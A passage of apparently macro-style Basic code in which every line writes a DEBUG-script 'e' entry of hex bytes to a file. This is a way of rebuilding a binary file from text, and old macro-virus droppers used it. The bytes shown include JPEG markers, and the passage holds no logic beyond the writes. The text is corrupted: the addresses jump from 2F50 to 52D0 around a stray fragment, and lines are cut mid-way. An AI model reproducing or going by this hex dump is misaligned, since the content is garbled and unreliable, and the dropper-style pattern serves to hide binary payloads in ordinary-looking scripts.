EF 67 79 74 22" Print #1, "e 2520 EA 2C C4 D1 69 52 CA 32 74 BA 2D 68 78 1A 94 D6" Print #1, "e 2530 03 86 04 1C 16 95 57 D2 7D 28 7C 26 1A 6F 29 A5" Print #1, "e 2540 ED 0E 03 80 B2 39 4C 7C 39 B4 44 B1 AF CC 20 CB" Print #1, "e 2550 D0 A5 47 46 DF 44 5E 66 BF A4 9D D1 D5 76 95 E9" Print #1, "e 2560 88 E3 2B 13 5B 0B D5 BA CB 30 BE C9 69 59 9A 25" Print #1, "e 2570 40 67 70 53 A4 25 C5 4B D8 1A 3C 54 1E ED FB B6" Print #1, "e 2580 D9 7D D5 0D 32 35 1D D9 6D 56 85 84 5D 5C A8 1D" Print #1, "e 2590 DD E5 68 3E 05 5F D9 FF 00 B9 AA FA 67 A0 59 AB" Print #1, "e 25A0 63 FA 8C 22 D6 BA 07 E8 29 DF 87 04 53 EB DE 7F" Print #1, "e 25B0 FE CF E8 16 12 D5 84 58 A0 F0 B2 39 D8 74 23 12" Print #1, "e 25C0 96 51 A8 E6 F3 C2 AE DB A6 31 CD 76 19 CD 09 D4" Print #1, "e 25D0 E8 53 0C 6F 21 C5 53 71 91 00 EC 0E 0C 26 99 E8" Print #1, "e 25E0 A0 1B AB AD D7 11 F4 EC BE 8A 29 53 7B 8F 40 B3" Print #1, "e 25F0 34 85 75 14 98 E7 F8 05 47 B4 69 17 EE B5 AF 20" Print #1, "e 2600 81 A5 86 DB ED 90 21 9C D4 05 AD 95 B4 
EF 02 D1" Print #1, "e 2610 2D 5B 8B 2C 2B A9 22 56 9D DB FE 51 DF 5F F4 0A" Print #1, "e 2620 59 11 D4 A7 55 AA E6 CF 00 D4 1B C5 36 BD 66 87" Print #1, "e 2630 3C DD 80 F0 EA B0 B8 92 54 B6 FC 93 D8 ED E7 18" Print #1, "e 2640 58 CF 04 D7 8D 10 73 CC 35 A6 7C 56 8E 8D 25 07" Print #1, "e 2650 80 A9 BC 8C EE 13 3C 91 6E 67 46 A5 76 8C 58 AA" Print #1, "e 2660 96 E3 16 6C A8 71 2E 53 CD 53 66 8D 17 71 1C 94" Print #1, "e 2670 00 19 4C 68 D6 A1 87 7D A6 7D 84 3C 07 05 EB 31" Print #1, "e 2680 8F DD 48 05 E7 AA F5 7B 2E 7B E0 E2 8F 05 9A 07" Print #1, "e 2690 D4 56 4B FD 22 57 B9 79 F2 47 D5 B9 68 76 6B B3" Print #1, "e 26A0 AF 82 D4 FD 96 A5 6F 2B CA B3 AF DE CB 46 A1 F2" Print #1, "e 26B0 57 A4 FF 00 B2 B8 21 69 DF 7F D7 FD 02 C3 86 55" Print #1, "e 26C0 98 10 74 87 02 99 87 E4 B2 0D AD B8 4D D7 FB 5F" Print #1, "e 26D0 77 A5 93 47 54 E5 4C CF 3D 80 FC 52 9A 87 CA 1A" Print #1, "e 26E0 AE D6 7D 8A 2D 0F 81 1C 93 DD 50 7A B9 81 D5 5E" Print #1, "e 26F0 9B 27 AD D1 7B 59 80 13 CB 55 53 9C 26 84 23 91" Print #1, "e 2700 9E FC D0 AB 07 93 94 54 69 1E D0 33 11 03 A2 64" Print #1, "e 2710 36 E7 69 35 0E 14 54 ED DE 85 93 13 FE 96 CA 82" Print #1, "e 2720 C2 3C 6C BD F0 FB 2B 56 FF 00 AF F9 53 4D ED 7F" Print #1, "e 2730 8D 96 EB 9A EE 0B 76 3C 56 7A 83 C8 2C D7 F1 59" Print #1, "e 2740 58 02 E1 F6 5A 85 70 0A 33 4D BF 65 BA 02 E2 15" Print #1, "e 2750 AA 15 6A 93 E4 AC 41 42 71 2E CE 9D 86 AA E9 95" Print #1, "e 2760 1E DB 9E AA F4 A5 61 D2 91 DD E9 D1 49 C5 E4 80" Print #1, "e 2770 10 D0 37 5A 98 EA A0 B7 37 10 A2 72 94 C0 C1 68" Print #1, "e 2780 D9 09 A9 AD 79 D7 45 89 EE 74 72 08 E2 0C C5 CA" Print #1, "e 2790 16 09 8B A2 EA 8F 38 4F 25 86 8E EB 32 AC 7D 60" Print #1, "e 27A0 A9 C5 64 4D 31 35 5F 69 3A F7 EC 56 1A AD C4 DE" Print #1, "e 27B0 45 7A A7 76 67 91 D1 48 18 DB CD B7 F6 43 03 4F" Print #1, "e 27C0 8A 69 E5 B3 54 DB 98 D9 91 62 7B E9 53 F0 74 AF" Print #1, "e 27D0 5B E9 3F 60 A6 CF 3F AE EA 29 90 8E 1B 1E 6B 31" Print #1, "e 27E0 5A 29 25 5B EE B2 36 A3 FC 
1A AF 4D FE 61 49 59" Print #1, "e 27F0 9C AD 2A E6 07 45 18 8A 8C 48 8D BA 6C 67 D2 14" Print #1, "e 2800 BD B3 1D 54 8A 6D 9E B7 DB 78 21 59 B8 7E 92 54" Print #1, "e 2810 B1 80 1E 68 62 17 E6 A1 B5 5D 0A 71 95 99 C4 EC" Print #1, "e 2820 B8 95 1C 15 B1 0F 35 05 A1 59 61 ED 1D 0A 1B 51" Print #1, "e 2830 C3 CD 66 71 2B 23 88 58 B1 BA 42 20 D4 31 DD F5" Print #1, "e 2840 80 B8 47 38 EE 65 71 5E BA 9B 1F D5 02 C1 00 F0" Print #1, "e 2850 9E F0 6F 34 0B B3 9E AA C2 3B 84 F2 52 B9 05 AA" Print #1, "e 2860 B9 2B 54 08 5A 0D B8 6A 54 2D 01 64 64 9E 65 6B" Print #1, "e 2870 DC BB 47 D9 71 1E 0A CF 29 A6 F2 AE CF DD 65 6C" Print #1, "e 2880 77 3F FF C4 00 28 10 01 00 02 02 02 01 04 01 04" Print #1, "e 2890 03 01 00 00 00 00 00 01 00 11 21 31 41 51 61 10" Print #1, "e 28A0 71 81 91 A1 20 B1 C1 D1 30 E1 F0 F1 FF DA 00 08" Print #1, "e 28B0 01 01 00 01 3F 21 67 52 88 5B 89 5E 35 C8 F6 45" Print #1, "e 28C0 18 87 53 27 70 00 C8 BC CA 45 AB C0 15 1A C1 87" Print #1, "e 28D0 4A 85 FF 00 68 F0 3E 1B 8E E8 43 40 0F 24 62 8B" Print #1, "e 28E0 10 A4 2D 25 73 49 25 B2 BA 1D 12 B9 59 5A 54 B8" Print #1, "e 28F0 09 F5 C9 86 32 59 8F A6 E5 1E 12 EF D0 C3 51 4B" Print #1, "e 2900 C4 BF 52 04 4A AB A8 CE 3E A8 DF A3 89 6B 8B D4" Print #1, "e 2910 8C 37 00 E0 CF 08 7A 15 CA D5 E2 72 54 2C 83 33" Print #1, "e 2920 03 C3 AC CD 1A CC D3 79 51 FA 16 30 79 CA 7E 80" Print #1, "e 2930 4B 30 58 D3 EE 05 46 09 6F 59 26 65 2F EA 31 08" Print #1, "e 2940 B0 E3 FB 45 89 81 CC 2D 26 5A BD 10 91 81 82 63" Print #1, "e 2950 C7 C4 63 EB A7 BE AD 99 30 B7 4E E5 1D 53 B1 2D" Print #1, "e 2960 AE E6 6C ED 53 39 E7 37 B9 45 51 F9 60 86 3E 64" Print #1, "e 2970 C3 DA 87 D4 AD 35 CB 20 FA 64 C4 B8 AF 42 F4 F4" Print #1, "e 2980 15 4A DD 7E 71 E9 46 5E D4 F6 E7 B7 14 EA 79 BD" Print #1, "e 2990 02 E3 C9 1E C9 56 FE 9B C9 01 E6 03 82 78 08 07" Print #1, "e 29A0 08 C8 73 42 10 77 96 64 35 60 DC 40 22 8D 34 51" Print #1, "e 29B0 B6 20 9A A7 19 31 7A 89 88 2E 50 FE 26 3B 8A 78" Print #1, "e 29C0 4A 16 E5 02 41 
E0 87 2E CE 7A 7B C6 11 8F 7B 2F" Print #1, "e 29D0 FA 95 03 C3 11 96 03 0A 30 7C 2A 79 96 90 37 80" Print #1, "e 29E0 99 43 A5 53 95 97 2F 43 70 D4 A8 EF B9 5E 6D 0C" Print #1, "e 29F0 CB E5 66 78 30 4A 44 01 94 D1 93 1F DF 28 28 34" Print #1, "e 2A00 30 0F 68 26 8B 32 5D BC 32 91 C9 72 63 5F 99 49" Print #1, "e 2A10 00 E1 95 81 D2 DA D7 C1 CC 60 AE 82 E2 38 7C 78" Print #1, "e 2A20 DB 7B 86 C6 08 D5 78 63 87 A7 F8 25 9C C6 EB 49" Print #1, "e 2A30 42 55 E5 02 B8 16 4E FD 0C D3 0F F1 00 2E A0 FA" Print #1, "e 2A40 FA 25 1F D1 15 B0 9F A9 61 FE 52 B9 9C 08 35 79" Print #1, "e 2A50 43 60 E5 C7 71 C6 6B B8 81 6A 4C C3 11 83 7B D4" Print #1, "e 2A60 21 76 3A 5C 2A 45 5E A2 E4 A6 E0 53 28 A8 17 C2" Print #1, "e 2A70 06 A5 56 4F 99 69 B3 ED 71 D7 89 67 32 DA 8D B6" Print #1, "e 2A80 3F 28 C1 B2 BC 80 96 33 13 E8 62 CF D0 98 36 F0" Print #1, "e 2A90 4E 25 F4 4C 9E 13 68 5D 49 B6 EF 01 2D 60 C1 07" Print #1, "e 2AA0 C2 D1 CC 78 EC 83 DC F9 75 ED 15 4F 32 17 3A 12" Print #1, "e 2AB0 BF 9A 46 35 6A BE AF E2 56 78 07 FC 19 6F 79 72" Print #1, "e 2AC0 AE 63 8E B3 3C 8D 75 12 DA 1A 87 73 F8 99 2E 2B" Print #1, "e 2AD0 F4 8A 94 CA 7A 67 89 83 E9 4E B0 76 CA 19 58 0B" Print #1, "e 2AE0 20 5C 07 B4 CE 5D BE 26 9F D2 25 B1 7C E6 23 CB" Print #1, "e 2AF0 C4 14 75 A8 FA 75 7A 5E F9 78 37 99 6E FD 0F 1C" Print #1, "e 2B00 F0 CF 32 57 CA 78 A5 BA 8C D0 FB 78 8D D9 F2 F3" Print #1, "e 2B10 2C 71 7E 6F D0 17 E1 95 8D B8 4A AC D4 7B 41 78" Print #1, "e 2B20 36 0D DF 68 DC C2 F2 B0 C1 7F D7 30 05 46 00 BB" Print #1, "e 2B30 B8 25 19 D2 2A 57 D8 E5 84 BC CB 06 8C A9 C1 95" Print #1, "e 2B40 B6 55 E6 37 01 57 18 98 A3 55 CC DB 0E 65 26 9B" Print #1, "e 2B50 71 5F 28 10 D3 93 A2 36 6A 8D 16 D7 75 39 48 F8" Print #1, "e 2B60 81 1D 46 34 4D 65 49 B0 F1 89 E5 99 56 A5 A3 8D" Print #1, "e 2B70 C6 27 5A 11 FD FE 22 10 55 F4 40 E3 18 F9 8B 12" Print #1, "e 2B80 B0 2D 2B 4F 98 DE FF 00 94 AB 19 6F 6F E8 AA 84" Print #1, "e 2B90 3A D0 D8 09 5F 11 0A D4 2D 12 B1 55 06 CC 5B E9" Print #1, "e 2BA0 83 
6F EA 1F FA 20 B8 83 6A 10 6C 87 DC 31 A1 32" Print #1, "e 2BB0 CC 50 4B A2 0B 7E 86 FD 56 A8 30 FD 05 44 75 0E" Print #1, "e 2BC0 F4 17 1D FA 33 A1 99 4A 44 39 42 E6 3B AF C4 4A" Print #1, "e 2BD0 4D B5 A2 67 BD 70 CE 2F 03 E9 DC A9 BB A5 35 07" Print #1, "e 2BE0 A8 CC 1B BA 5D D1 1A B4 79 11 A7 2C 47 54 DD FA" Print #1, "e 2BF0 0A E5 D3 A8 EB F2 8B 28 67 F1 C5 B8 22 02 5A EC" Print #1, "e 2C00 E6 B8 9E 54 87 A9 94 45 B7 6C F7 62 C4 60 12 67" Print #1, "e 2C10 8F E2 58 CD F1 C3 F9 8F 30 0F 64 E4 15 D3 10 D3" Print #1, "e 2C20 CC BB 30 6F CC AF 03 F3 0C DE 0B 40 E1 6E A3 46" Print #1, "e 2C30 A1 ED 2B 18 34 7B 81 DC 44 17 83 86 A3 A3 66 0A" Print #1, "e 2C40 E2 71 EF 2B B0 F7 62 DC 22 A6 BE 98 D9 16 6A 75" Print #1, "e 2C50 B9 65 10 C0 6A A3 52 D5 C5 56 73 CC EC 11 19 B9" Print #1, "e 2C60 42 E2 07 25 40 5A 7A 96 88 AE 6E 22 1F D4 7F 74" Print #1, "e 2C70 C8 66 1E 83 09 B9 68 38 83 E9 0C B1 8A A6 1A BD" Print #1, "e 2C80 FD 00 B0 80 62 B8 88 C0 AA 05 4D 51 18 4C AC EA" Print #1, "e 2C90 02 8E 60 6B 32 AD D4 26 69 54 92 8B 1A 6D 6E 62" Print #1, "e 2CA0 CF 2A 1D CB 00 3A F4 16 3E 65 2F 8F A1 50 8D 58" Print #1, "e 2CB0 60 4B 2C AE 88 EA 59 E8 2F 9B 9B 94 FC 93 05 FB" Print #1, "e 2CC0 03 31 3F BD 42 66 80 B9 1B A3 F1 C7 9F 54 A1 D3" Print #1, "e 2CD0 37 B4 A9 49 D0 84 A5 AA 7C 73 2B AF 01 91 D4 A5" Print #1, "e 2CE0 8E E3 30 D2 26 82 A8 77 E1 26 3E E8 E1 51 F9 87" Print #1, "e 2CF0 44 A5 CB E6 38 A0 FD CC 9A 3A B4 78 1D 5A A7 BD" Print #1, "e 2D00 72 87 37 52 B1 D4 AC FE 50 C8 68 9C 8F 96 E5 5E" Print #1, "e 2D10 9F 68 99 6E 25 56 E3 02 46 CC BF B9 BC 9B F9 CD" Print #1, "e 2D20 7E 9C 7A 93 69 CC 25 C1 F4 61 16 30 52 C0 03 DB" Print #1, "e 2D30 B9 D6 38 1C AA 9A C5 42 A8 D5 66 33 51 5C 92 F8" Print #1, "e 2D40 7B 75 25 1B 01 F3 84 C2 10 79 FF 00 59 49 F9 22" Print #1, "e 2D50 AE 83 BB 20 6A BF 5C C4 CD 41 41 59 76 97 15 1E" Print #1, "e 2D60 D8 6F A3 2F D8 B7 A2 15 41 76 B3 AF 09 AC E2 8D" Print #1, "e 2D70 A9 7D C2 36 1E 50 56 5C CC 64 0B 06 A6 17 2B 97" Print #1, 
"e 2D80 31 20 DE 04 2B C9 26 01 E2 30 1D B1 15 BC A9 95" Print #1, "e 2D90 79 23 C6 5C 6C 81 D9 1F F3 B9 66 AD E5 DC 65 55" Print #1, "e 2DA0 81 B0 78 26 78 C6 8C 0F C4 51 EF 87 F2 19 9F 72" Print #1, "e 2DB0 91 F3 59 70 D0 E0 D5 75 96 3E 4A 19 F1 F9 D4 2D" Print #1, "e 2DC0 1A 14 B1 93 DB A9 8A E5 9C 24 B6 F6 63 F7 6A 24" Print #1, "e 2DD0 65 75 6C 33 C3 C2 D4 0A A8 BC C0 B9 7B 81 94 99" Print #1, "e 2DE0 80 79 62 01 54 15 14 E0 E2 16 89 76 41 02 D1 CF" Print #1, "e 2DF0 A5 11 FE 50 81 AD A7 86 64 29 65 5B C4 7A A4 B8" Print #1, "e 2E00 5E 56 03 D0 EB D2 F1 2F F4 2E 1E 8B E9 2D 08 A2" Print #1, "e 2E10 D4 B9 83 0D A1 92 2B 80 F0 42 38 5E 06 63 6E 26" Print #1, "e 2E20 75 E2 08 01 67 3D C1 67 91 F4 D6 0A FF 00 8A 21" Print #1, "e 2E30 7B 07 DA 50 43 56 FC 9E D0 73 EE 8C FD 10 CB FA" Print #1, "e 2E40 49 39 8B 6A 1A 8C 38 E1 E4 5D 4E 5A C4 6B DF D0" Print #1, "e 2E50 46 02 71 17 55 0D 97 A8 94 A4 D5 F5 1D 2C 7C C5" Print #1, "e 2E60 BE 71 3D EC C2 DF E6 11 95 56 F5 4A 5D A7 1D 3F" Print #1, "e 2E70 88 83 FE AA 3A 98 18 6F 77 E4 8F D5 53 13 6B 88" Print #1, "e 2E80 34 0A 18 0F 78 D0 D5 10 59 51 0D 8E F2 7F E2 27" Print #1, "e 2E90 CD E9 42 D0 39 22 78 96 CF E2 71 A8 C0 14 F2 5B" Print #1, "e 2EA0 B4 62 C3 69 B3 DE DE 4F 33 2E 00 CC 83 A3 57 3B" Print #1, "e 2EB0 84 72 3D FF 00 F9 96 F2 33 20 BE D8 44 9F B2 1B" Print #1, "e 2EC0 A3 E3 33 3D 02 A3 E8 65 5C 39 D3 49 9F DA 3B 50" Print #1, "e 2ED0 D9 57 F0 A9 99 37 3E EF DE 5C D9 B9 16 E0 6F 67" Print #1, "e 2EE0 4F 0B 24 4C BC CE B5 6C 89 8A 82 B1 0D 39 4A B1" Print #1, "e 2EF0 61 8E 84 4B 0B B5 53 71 3E D2 82 EF 31 7A 12 E0" Print #1, "e 2F00 C2 5C 20 CD 62 C2 12 F5 45 38 21 97 48 6E 8A 4C" Print #1, "e 2F10 47 82 A0 F0 40 70 6E 72 6F A5 D4 70 7E 54 6B 1F" Print #1, "e 2F20 D5 20 55 0E 41 C7 BC DD F0 D5 66 54 6A 7B 42 18" Print #1, "e 2F30 8A 4A E1 30 B0 B3 A8 39 47 23 F7 77 0D DB C4 76" Print #1, "e 2F40 FA 43 61 7E EA 6B 34 4B A8 38 6B 6C D1 9C 4A 43" Print #1, "e 2F50 E1 04 EF 50 DA E4 F1 2E 16 1E 2A 75 82 89 69 44" 
7F 23 4A" Print #1, "e 52D0 6E FE 59 2D A3 A0 68 D7 78 FB 40 3F 69 D5 5D F1" Print #1, "e 52E0 8F 32 CA 0E 89 3B 50 0F 7B 63 1A B6 17 8F 43 03" Print #1, "e 52F0 7E 19 C2 9D C2 2F 48 B4 5F 45 19 81 CA CD E1 02" Print #1, "e 5300 26 0C AF 07 57 BC 14 81 2D 48 11 D0 68 6E C9 F8" Print #1, "e 5310 5C FA 7C CD F0 91 B1 EB 5C 12 9B F9 EF 5D 0F 25" Print #1, "e 5320 92 C5 21 71 47 40 4A BD 46 FF 00 C0 69 75 7C C4" Print #1, "e 5330 2F 01 89 92 34 51 2E 3B 9D 8E 97 E2 5A 35 A2 E4" Print #1, "e 5340 FC 4B A0 E6 A8 D9 10 7B 3D 5E 25 FF 00 4C ED 98" Print #1, "e 5350 BC 69 26 03 F5 2F 4D EF 11 30 9B 58 40 BD 08 16" Print #1, "e 5360 C6 30 67 05 0F 63 F4 41 3B 81 76 5C 67 69 83 BA" Print #1, "e 5370 83 0A 6D F3 2C BE F8 D8 1C 65 20 50 CB 15 AE 0F" Print #1, "e 5380 A2 85 E2 79 2C 52 16 70 55 62 D4 19 9C 9C D6 89" Print #1, "e 5390 78 17 75 0A 6E B0 36 6A 2A 95 23 81 A2 20 C8 B7" Print #1, "e 53A0 A9 4B 48 AE B0 D5 A7 F2 20 77 20 27 EA 2B 5F 27" Print #1, "e 53B0 FD 40 23 A9 D6 4A 3A C8 08 37 5C 0B D0 82 B0 75" Print #1, "e 53C0 1D B0 D6 1A F7 0B 50 09 05 D9 5D AC A3 58 82 DC" Print #1, "e 53D0 F0 10 59 B0 B8 56 7C 40 0C E2 2B 0B CD 67 0F 88" Print #1, "e 53E0 B9 96 82 5C B6 74 30 09 42 36 73 0C 32 9D B8 98" Print #1, "e 53F0 65 36 EC 13 FB 0B BE 61 C7 48 95 BE E6 E1 B2 80" Print #1, "e 5400 BB B5 18 53 8B 0D 6A 22 C2 2E DB 7A 44 F1 98 4D" Print #1, "e 5410 6A 99 BD 33 EC 62 B6 ED 57 AC 33 48 AC 4B 0C 66" Print #1, "e 5420 A2 8D A7 1D 48 EF 1F 85 1C 33 2C 2A ED FF 00 02" Print #1, "e 5430 54 5C 94 18 3B B1 C8 80 18 05 B2 E5 37 E2 59 58" Print #1, "e 5440 5E 5A BA D4 BB 2F 06 EA 06 40 8A C7 46 E5 1F 29" Print #1, "e 5450 75 7F 03 AD F7 ED BC 40 18 5A D8 9A 4F 31 1D 5C" Print #1, "e 5460 B9 C1 7D C4 07 9B 52 C7 71 1E 6B BE 2E 74 B7 63" Print #1, "e 5470 B5 B0 AE A5 E4 78 21 6C B8 58 11 E2 73 63 2E 7B" Print #1, "e 5480 85 9A FA 82 A8 78 7C 44 B3 6A 36 86 A0 AC 12 8B" Print #1, "e 5490 6D 7B AF 59 C4 40 69 2C 82 95 33 97 30 D3 65 71" Print #1, "e 54A0 32 12 96 1B 82 F9 23 28 96 
98 40 F3 1B 8F A8 3E" Print #1, "e 54B0 51 DC B9 8E 76 8C 2B 67 48 AB 6E 58 A7 71 87 4B" Print #1, "e 54C0 83 30 56 34 B0 77 60 96 D0 CE 25 28 3C A3 5B 29" Print #1, "e 54D0 B8 A3 DA A7 58 DE 52 2E EE 46 85 66 8F 1C 52 1F" Print #1, "e 54E0 59 48 C1 E3 6B B2 BB FC C0 08 D8 A1 BB 64 FD C5" Print #1, "e 54F0 9C 07 16 42 FD D0 1C 7E E1 30 2F 70 CF 28 11 67" Print #1, "e 5500 AD 28 4E C0 6B BE 7B 31 00 AA AC B9 BA 07 5B B3" Print #1, "e 5510 AC B4 02 98 A3 9B AC 5C 32 8D 62 09 A6 38 AA 58" Print #1, "e 5520 8C B5 4F 0A 91 4F 67 FB 80 9E 62 C5 69 05 4D C8" Print #1, "e 5530 1A F6 EB 32 71 5D FA 3E 5C F8 81 53 4C 30 6C E4" Print #1, "e 5540 F4 C2 D0 CD D2 E3 7B 00 75 67 3A E6 23 21 38 AB" Print #1, "e 5550 5B 55 E6 05 27 33 6C D9 DE 1A B9 DD 2B 14 95 4C" Print #1, "e 5560 C0 03 8C B7 E4 85 9C 05 90 7F 23 2F F2 D0 3D 7A" Print #1, "e 5570 FF 00 D2 44 DF 6B 2A AA FB AE FC C7 09 5E 87 57" Print #1, "e 5580 96 2A 1C AF 11 A0 9A 55 5E 1E D1 5B 4A 40 AF 11" Print #1, "e 5590 07 BA 52 08 D2 5B 28 55 D0 73 4E 17 82 50 D8 71" Print #1, "e 55A0 64 0E 57 5D CE 63 CB C4 16 ED 3F DB 6C B8 1C 13" Print #1, "e 55B0 7E D9 C4 4B 91 A8 E4 86 FF 00 15 FE 16 B3 7E 35" Print #1, "e 55C0 A3 5A 1E B7 86 AF 11 AB 00 D9 A0 18 34 07 38 BB" Print #1, "e 55D0 8B 40 B1 8E 79 8C 73 4A 31 C0 CB CC 00 C3 04 39" Print #1, "e 55E0 65 0D 21 3C C4 2D 81 E6 22 E5 77 10 60 26 45 7B" Print #1, "e 55F0 03 83 DC B7 A5 7E A6 98 A9 41 B1 25 2F 59 6A 1A" Print #1, "e 5600 9D 96 FA 61 8C BE 17 93 6B 19 0A 7C CB 7B 6B 3C" Print #1, "e 5610 AD B6 92 81 39 54 05 A2 59 51 2D E1 F3 6B 46 60" Print #1, "e 5620 40 D0 33 0F 4E 55 88 08 91 F0 64 4E 8D 7D 40 66" Print #1, "e 5630 9A 28 6B BE A1 A1 05 B5 CF 9B 82 24 30 D1 4E E0" Print #1, "e 5640 3F B1 EF 6F A3 07 AE 2B E7 AC A4 AC 56 41 7E C6" Print #1, "e 5650 23 04 21 E8 2B 39 BB 35 DF 51 C9 C0 38 F0 03 97" Print #1, "e 5660 9F 10 CA B4 EB 87 C9 15 CE 35 43 D0 E2 0C 26 9C" Print #1, "e 5670 2D 59 E9 9A F8 4F 90 C4 B5 DC C4 4F 3E 44 B8 EA" Print #1, "e 5680 0D 9F 31 B0 BA 
A3 0E 80 AF B7 A8 F1 62 85 8C 0E" Print #1, "e 5690 43 86 05 23 11 51 C3 06 F7 05 30 4A C5 3C 4C A5" Print #1, "e 56A0 7E 12 E3 86 E8 7C 8F F5 1F 6E 79 4B FD 7B FF 00" Print #1, "e 56B0 04 5B C0 17 57 D6 56 D5 F3 B0 7C 47 23 66 AB A3" Print #1, "e 56C0 F7 19 AC 5D C0 CD 1F 83 CE 4B 6A 6B AD C5 2E 55" Print #1, "e 56D0 A9 B5 7A CE 76 A1 8F 2E 42 5C EF 83 BC 3C 38 FD" Print #1, "e 56E0 C4 06 7D CE 21 01 80 7C 4C 41 85 0C A7 58 D5 F6" Print #1, "e 56F0 83 3B AE 55 E9 F9 C4 44 DF F8 5E 26 E3 08 17 AE" Print #1, "e 5700 91 28 E4 8B 3B CA AE 25 0F 53 DC 6C D2 C2 15 DE" Print #1, "e 5710 AE A0 C8 8A AB 1C 4A 1D 10 61 AC 8A FB 1E C4 07" Print #1, "e 5720 AB 35 E2 5E 66 4C AE A3 FE 79 21 B1 B5 DA 5D 4B" Print #1, "e 5730 CF 86 95 27 CB 96 C9 8B 15 7E EA 24 69 02 AC 51" Print #1, "e 5740 4D 9C F5 8E CF 06 D2 3B 4A E2 98 D5 49 9B 60 38" Print #1, "e 5750 31 AD E2 E2 1A 1A C5 7A 6C 19 EB 57 2C 46 2D 5E" Print #1, "e 5760 FC 55 69 89 CC 86 AE 89 BE EF 82 0F D6 42 63 9C" Print #1, "e 5770 5A 8C 55 95 56 78 5F 0A 45 45 BE 80 2E 94 DD 0D" Print #1, "e 5780 58 CD 45 EE A2 BC 5B 6B 71 62 26 22 C2 E9 5C 1A" Print #1, "e 5790 D9 96 E1 7C 0A 5E EB A3 6A 01 47 14 B5 DC CB DE" Print #1, "e 57A0 2B DC 84 6C B5 D2 E5 30 07 58 9F 15 01 07 62 D8" Print #1, "e 57B0 78 73 5E A1 7A 58 CD 89 F0 E6 05 53 E8 0F A3 21" Print #1, "e 57C0 F1 99 4B 3F 74 4F FC E9 F9 FC 3F 84 A9 C7 5E 91" Print #1, "e 57D0 5A 01 60 37 52 8E 4B F7 52 92 C0 23 2C 5F DC 02" Print #1, "e 57E0 C2 51 36 B7 53 05 78 CF E1 E2 DA 81 B5 18 47 25" Print #1, "e 57F0 78 8F 2E 36 6A 65 FE A0 67 49 98 19 DB C5 33 E3" Print #1, "e 5800 DB BC 29 40 E2 2E 31 1A B4 35 46 E3 20 5D D3 51" Print #1, "e 5810 11 7D 42 5B F8 20 9B 45 D1 B7 B4 28 CC C8 1F 85" Print #1, "e 5820 0F 70 36 8E 2C 47 B8 55 CC D9 3E 60 3C A1 84 1D" Print #1, "e 5830 8D 6A 32 BF 15 33 FF 00 E1 4B 95 A5 E2 56 B3 2F" Print #1, "e 5840 58 11 8E F3 30 29 73 03 1A E8 0A DE 0A 8A 8C 4F" Print #1, "e 5850 C9 D8 8A 32 F2 5F 43 F5 2F 3E 03 C3 C1 3B 8F F2" Print #1, "e 5860 5B 
55 6D 4B 55 98 B3 2E 45 E0 B5 A2 B8 81 6A 29" Print #1, "e 5870 E6 12 A8 17 0C E5 6F 79 C1 7F 73 56 22 BE 11 74" Print #1, "e 5880 94 D8 0D 75 78 86 2B A3 C0 56 20 29 78 BF 03 1F" Print #1, "e 5890 B7 79 86 D1 4B 62 D3 4A 63 1D 6E 03 93 70 AB 68" Print #1, "e 58A0 5B B7 3D E1 60 DE 68 34 5B AE 15 83 18 81 9E 15" Print #1, "e 58B0 46 58 0A 5D 9F B3 AC 08 9E 0E 9B BD 91 9C 69 2F" Print #1, "e 58C0 11 05 40 E5 9E 0B 1E 6E 2E C2 23 08 0E CB 72 8E" Print #1, "e 58D0 76 B0 ED 14 34 72 A5 59 06 97 EA 53 C0 1C AA CF" Print #1, "e 58E0 A8 A0 56 DB B9 DD 4C C0 E6 2C D0 03 FB F7 38 74" Print #1, "e 58F0 C1 F9 11 8B 48 0D F6 1D 0D BE 66 7F 0C 25 6E 6E" Print #1, "e 5900 BE 91 90 93 4C 72 82 4D A6 5A 64 5B B6 3B 8C 14" Print #1, "e 5910 D4 B8 0D 1C CA B6 56 6E 2F 97 98 48 A1 54 60 23" Print #1, "e 5920 40 49 D1 98 6E D3 09 61 69 5A 8C E3 F2 56 50 24" Print #1, "e 5930 B5 41 DE 39 75 CB 62 9F 1B F9 95 0C 18 5E 0F 51" Print #1, "e 5940 6B 71 2C 04 F2 BA 08 0F 41 5D 67 E3 98 79 95 FE" Print #1, "e 5950 5C 7E 47 30 50 DF 43 31 16 DD 62 9D E3 61 0A 01" Print #1, "e 5960 BF 65 80 FF 00 B2 58 72 79 06 88 89 B0 C4 DC 4D" Print #1, "e 5970 95 E3 F2 03 70 08 51 EB 89 41 61 82 0A 0D 65 BD" Print #1, "e 5980 27 CC 0A 76 13 60 1B 03 37 77 9B 94 F4 B3 65 2C" Print #1, "e 5990 B6 1A 5F 13 32 6B 4E 8A D6 9D 62 A2 AE DB A2 E7" Print #1, "e 59A0 70 7F 62 33 EB 35 72 B2 C1 9D 65 1D 79 98 CB C5" Print #1, "e 59B0 76 B1 6A DA B3 9C A0 17 09 69 E9 EC 19 5B 1C 86" Print #1, "e 59C0 15 3A 8C 1B 53 A4 56 6F C0 0E AE A3 45 0A 34 32" Print #1, "e 59D0 1D A2 D3 77 8A AC 41 C1 33 9A CA CD 1D 65 AD A9" Print #1, "e 59E0 32 A8 27 42 E3 CE E4 F2 A4 0E 78 63 F2 3C 65 1D" Print #1, "e 59F0 E7 5C B0 92 90 DD 94 30 C4 F4 70 0D 82 2D 17 55" Print #1, "e 5A00 2A 50 DB BF 29 7F 84 95 AD 45 ED 8B 0B 10 4B 95" Print #1, "e 5A10 ED 12 EF 97 23 3F F9 33 32 A4 29 91 2E 6D E6 5E" Print #1, "e 5A20 6D 61 6E E8 9C CE 61 19 7D 14 F4 4E 35 37 18 ED" Print #1, "e 5A30 25 39 C1 11 D0 6E E0 B8 8F E4 75 71 91 D0 C0 07" Print #1, 
"e 5A40 AA 8A AB DE 5E 96 35 10 E4 DA 29 00 3B 23 95 EF" Print #1, "e 5A50 3A ED 2D 03 B8 65 D4 45 30 76 CC 56 AF 3A E7 EA" Print #1, "e 5A60 E2 B9 4C 41 AF 58 7E A2 40 AD 82 99 5F 8B FC 57" Print #1, "e 5A70 E7 8F C1 2B 03 CA 4B 7C B4 1E AA DD 3F D4 0F 2C" Print #1, "e 5A80 C9 49 FF 00 1D E1 5D 9E 3B E8 8C A7 65 8E 96 FC" Print #1, "e 5A90 6C A5 72 FE 2B F3 70 50 CA A9 DE 1B 4B 2A 60 C0" Print #1, "e 5AA0 F0 33 F4 0F F6 5D 3A 97 8F 3D B0 FE E3 D4 9A 70" Print #1, "e 5AB0 C9 2F 81 DA 08 30 67 55 87 44 B2 55 59 08 F8 54" Print #1, "e 5AC0 B3 12 CA DA 1E 98 99 7B AC 2F BB A2 69 B9 CC 3A" Print #1, "e 5AD0 73 41 